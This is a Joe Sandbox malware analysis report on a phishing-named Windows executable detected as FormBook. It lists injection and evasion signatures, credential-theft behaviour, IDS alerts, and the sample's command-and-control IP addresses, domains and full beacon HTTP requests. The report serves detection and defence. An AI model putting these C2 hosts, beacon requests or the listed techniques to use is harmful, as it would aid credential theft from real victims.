Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CSZ inquiry for MH raw material.exe

Overview

General Information

Sample name:CSZ inquiry for MH raw material.exe
Analysis ID:1589876
MD5:c5c00dae9e7cdd708ec3fdc5238d1577
SHA1:94d440e5b4f19b1c8860d1b381cd9259c05773de
SHA256:4c778d7518c4e1d2c8065b95dd694672207dc492f338370e89582c00d11084ec
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CSZ inquiry for MH raw material.exe (PID: 4820 cmdline: "C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe" MD5: C5C00DAE9E7CDD708EC3FDC5238D1577)
    • gGZaaTbTIZmmI.exe (PID: 5088 cmdline: "C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 2312 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • gGZaaTbTIZmmI.exe (PID: 5816 cmdline: "C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 5476 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.4277646294.0000000002B30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4278415007.00000000031F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.2174886702.00000000010E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.4278497197.0000000003280000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            0.2.CSZ inquiry for MH raw material.exe.220000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T09:38:11.146610+010020507451Malware Command and Control Activity Detected192.168.2.450051154.39.239.23780TCP
              2025-01-13T09:39:03.273683+010020507451Malware Command and Control Activity Detected192.168.2.44977847.83.1.9080TCP
              2025-01-13T09:39:26.531724+010020507451Malware Command and Control Activity Detected192.168.2.44993884.32.84.3280TCP
              2025-01-13T09:39:39.992101+010020507451Malware Command and Control Activity Detected192.168.2.450011172.67.182.19880TCP
              2025-01-13T09:39:53.823335+010020507451Malware Command and Control Activity Detected192.168.2.450015134.122.135.4880TCP
              2025-01-13T09:40:08.169783+010020507451Malware Command and Control Activity Detected192.168.2.450019199.192.21.16980TCP
              2025-01-13T09:40:21.840343+010020507451Malware Command and Control Activity Detected192.168.2.450023154.197.162.23980TCP
              2025-01-13T09:40:35.082669+010020507451Malware Command and Control Activity Detected192.168.2.45002784.32.84.3280TCP
              2025-01-13T09:40:49.173174+010020507451Malware Command and Control Activity Detected192.168.2.450031134.122.135.4880TCP
              2025-01-13T09:41:03.473517+010020507451Malware Command and Control Activity Detected192.168.2.45003547.83.1.9080TCP
              2025-01-13T09:41:16.715404+010020507451Malware Command and Control Activity Detected192.168.2.450039188.114.96.380TCP
              2025-01-13T09:41:37.999455+010020507451Malware Command and Control Activity Detected192.168.2.450043199.59.243.22880TCP
              2025-01-13T09:41:51.674007+010020507451Malware Command and Control Activity Detected192.168.2.45004718.139.62.22680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T09:38:11.146610+010028554651A Network Trojan was detected192.168.2.450051154.39.239.23780TCP
              2025-01-13T09:39:03.273683+010028554651A Network Trojan was detected192.168.2.44977847.83.1.9080TCP
              2025-01-13T09:39:26.531724+010028554651A Network Trojan was detected192.168.2.44993884.32.84.3280TCP
              2025-01-13T09:39:39.992101+010028554651A Network Trojan was detected192.168.2.450011172.67.182.19880TCP
              2025-01-13T09:39:53.823335+010028554651A Network Trojan was detected192.168.2.450015134.122.135.4880TCP
              2025-01-13T09:40:08.169783+010028554651A Network Trojan was detected192.168.2.450019199.192.21.16980TCP
              2025-01-13T09:40:21.840343+010028554651A Network Trojan was detected192.168.2.450023154.197.162.23980TCP
              2025-01-13T09:40:35.082669+010028554651A Network Trojan was detected192.168.2.45002784.32.84.3280TCP
              2025-01-13T09:40:49.173174+010028554651A Network Trojan was detected192.168.2.450031134.122.135.4880TCP
              2025-01-13T09:41:03.473517+010028554651A Network Trojan was detected192.168.2.45003547.83.1.9080TCP
              2025-01-13T09:41:16.715404+010028554651A Network Trojan was detected192.168.2.450039188.114.96.380TCP
              2025-01-13T09:41:37.999455+010028554651A Network Trojan was detected192.168.2.450043199.59.243.22880TCP
              2025-01-13T09:41:51.674007+010028554651A Network Trojan was detected192.168.2.45004718.139.62.22680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T09:39:18.851049+010028554641A Network Trojan was detected192.168.2.44988984.32.84.3280TCP
              2025-01-13T09:39:21.401927+010028554641A Network Trojan was detected192.168.2.44990584.32.84.3280TCP
              2025-01-13T09:39:23.982775+010028554641A Network Trojan was detected192.168.2.44992184.32.84.3280TCP
              2025-01-13T09:39:32.204209+010028554641A Network Trojan was detected192.168.2.449975172.67.182.19880TCP
              2025-01-13T09:39:34.749835+010028554641A Network Trojan was detected192.168.2.449993172.67.182.19880TCP
              2025-01-13T09:39:37.290019+010028554641A Network Trojan was detected192.168.2.450010172.67.182.19880TCP
              2025-01-13T09:39:46.174586+010028554641A Network Trojan was detected192.168.2.450012134.122.135.4880TCP
              2025-01-13T09:39:48.711601+010028554641A Network Trojan was detected192.168.2.450013134.122.135.4880TCP
              2025-01-13T09:39:51.292841+010028554641A Network Trojan was detected192.168.2.450014134.122.135.4880TCP
              2025-01-13T09:40:00.335255+010028554641A Network Trojan was detected192.168.2.450016199.192.21.16980TCP
              2025-01-13T09:40:02.902077+010028554641A Network Trojan was detected192.168.2.450017199.192.21.16980TCP
              2025-01-13T09:40:05.471425+010028554641A Network Trojan was detected192.168.2.450018199.192.21.16980TCP
              2025-01-13T09:40:14.130001+010028554641A Network Trojan was detected192.168.2.450020154.197.162.23980TCP
              2025-01-13T09:40:16.706928+010028554641A Network Trojan was detected192.168.2.450021154.197.162.23980TCP
              2025-01-13T09:40:19.375952+010028554641A Network Trojan was detected192.168.2.450022154.197.162.23980TCP
              2025-01-13T09:40:27.386966+010028554641A Network Trojan was detected192.168.2.45002484.32.84.3280TCP
              2025-01-13T09:40:29.912605+010028554641A Network Trojan was detected192.168.2.45002584.32.84.3280TCP
              2025-01-13T09:40:32.466923+010028554641A Network Trojan was detected192.168.2.45002684.32.84.3280TCP
              2025-01-13T09:40:41.535137+010028554641A Network Trojan was detected192.168.2.450028134.122.135.4880TCP
              2025-01-13T09:40:44.068393+010028554641A Network Trojan was detected192.168.2.450029134.122.135.4880TCP
              2025-01-13T09:40:46.611427+010028554641A Network Trojan was detected192.168.2.450030134.122.135.4880TCP
              2025-01-13T09:40:55.740151+010028554641A Network Trojan was detected192.168.2.45003247.83.1.9080TCP
              2025-01-13T09:40:58.302766+010028554641A Network Trojan was detected192.168.2.45003347.83.1.9080TCP
              2025-01-13T09:41:00.849557+010028554641A Network Trojan was detected192.168.2.45003447.83.1.9080TCP
              2025-01-13T09:41:09.055378+010028554641A Network Trojan was detected192.168.2.450036188.114.96.380TCP
              2025-01-13T09:41:11.603557+010028554641A Network Trojan was detected192.168.2.450037188.114.96.380TCP
              2025-01-13T09:41:14.168093+010028554641A Network Trojan was detected192.168.2.450038188.114.96.380TCP
              2025-01-13T09:41:30.343663+010028554641A Network Trojan was detected192.168.2.450040199.59.243.22880TCP
              2025-01-13T09:41:32.880046+010028554641A Network Trojan was detected192.168.2.450041199.59.243.22880TCP
              2025-01-13T09:41:35.449592+010028554641A Network Trojan was detected192.168.2.450042199.59.243.22880TCP
              2025-01-13T09:41:43.993299+010028554641A Network Trojan was detected192.168.2.45004418.139.62.22680TCP
              2025-01-13T09:41:46.568284+010028554641A Network Trojan was detected192.168.2.45004518.139.62.22680TCP
              2025-01-13T09:41:49.092506+010028554641A Network Trojan was detected192.168.2.45004618.139.62.22680TCP
              2025-01-13T09:41:58.708881+010028554641A Network Trojan was detected192.168.2.450048154.39.239.23780TCP
              2025-01-13T09:42:01.257990+010028554641A Network Trojan was detected192.168.2.450049154.39.239.23780TCP
              2025-01-13T09:42:03.818466+010028554641A Network Trojan was detected192.168.2.450050154.39.239.23780TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: CSZ inquiry for MH raw material.exeAvira: detected
              Source: http://www.adadev.info/ctdy/Avira URL Cloud: Label: malware
              Source: http://www.gayhxi.info/k2i2/?88v07=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&O2=aP0TtAvira URL Cloud: Label: malware
              Source: CSZ inquiry for MH raw material.exeVirustotal: Detection: 67%Perma Link
              Source: CSZ inquiry for MH raw material.exeReversingLabs: Detection: 65%
              Source: Yara matchFile source: 0.2.CSZ inquiry for MH raw material.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4277646294.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4278415007.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2174886702.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4278497197.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4278558823.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2174955869.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: CSZ inquiry for MH raw material.exeJoe Sandbox ML: detected
              Source: CSZ inquiry for MH raw material.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: CSZ inquiry for MH raw material.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2173539945.000000000087C000.00000004.00000020.00020000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000004.00000002.4278088224.0000000000C08000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2173539945.000000000087C000.00000004.00000020.00020000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000004.00000002.4278088224.0000000000C08000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gGZaaTbTIZmmI.exe, 00000004.00000002.4277644545.000000000058E000.00000002.00000001.01000000.00000005.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000000.2244895308.000000000058E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2082729262.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.2080312992.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.2174231836.0000000000F2E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4278696294.000000000377E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4278696294.00000000035E0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2175535576.0000000003438000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2173717947.000000000328A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: CSZ inquiry for MH raw material.exe, CSZ inquiry for MH raw material.exe, 00000000.00000003.2082729262.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.2080312992.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.2174231836.0000000000F2E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000005.00000002.4278696294.000000000377E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4278696294.00000000035E0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2175535576.0000000003438000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2173717947.000000000328A000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B4C870 FindFirstFileW,FindNextFileW,FindClose,5_2_02B4C870
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax5_2_02B39EC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi5_2_02B3E4C7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h5_2_033804CE

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49778 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49778 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49889 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49921 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49938 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49938 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49905 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49975 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49993 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50011 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50011 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50010 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 18.139.62.226:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50015 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50015 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50019 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50019 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 18.139.62.226:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 18.139.62.226:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50039 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50043 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 18.139.62.226:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 18.139.62.226:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 154.39.239.237:80
              Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
              Source: Joe Sandbox ViewASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /k2i2/?88v07=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&O2=aP0Tt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /zaz4/?88v07=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&O2=aP0Tt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /kxtt/?O2=aP0Tt&88v07=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /a59t/?88v07=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&O2=aP0Tt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44756.pizzaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
